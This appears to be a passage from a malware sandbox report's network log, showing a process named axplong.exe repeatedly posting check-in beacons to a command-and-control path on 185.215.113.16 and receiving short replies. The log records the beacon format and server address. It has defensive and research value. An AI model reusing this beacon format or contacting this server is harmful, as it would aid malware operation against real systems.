                      Jul 26, 2024 13:44:35.083563089 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:35.864424944 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:35.865273952 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:36.210395098 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      28 | 192.168.2.5 | 53675 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:36.327007055 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:37.088550091 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:36 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:37.089238882 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:37.337680101 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      29 | 192.168.2.5 | 53676 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:37.527575970 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:38.278229952 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:38.281565905 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:38.609952927 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      30 | 192.168.2.5 | 53677 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:38.717453003 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:39.893336058 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:39.896759033 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:39.899817944 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:39.910048008 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:40.159702063 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      31 | 192.168.2.5 | 53678 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:40.281171083 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:41.152069092 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:41.152724981 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:41.403776884 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      32 | 192.168.2.5 | 53679 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:41.521389008 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:42.298847914 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:42.311791897 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:42.595769882 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      33 | 192.168.2.5 | 53680 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:42.717983961 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:43.471055031 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:43.471693993 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:43.719747066 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      34 | 192.168.2.5 | 53681 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:43.827101946 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:44.988388062 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:44.989340067 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:44.992512941 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:45.238414049 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      35 | 192.168.2.5 | 53682 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:45.368541002 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:46.131669044 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:46.134480953 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:46.388288021 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      36 | 192.168.2.5 | 53683 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:46.504507065 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:47.274538040 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:47.275854111 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:47.675021887 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      37 | 192.168.2.5 | 53684 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:47.796544075 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:48.588161945 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:48.588973045 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:48.843326092 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      38 | 192.168.2.5 | 53685 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:49.354079008 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
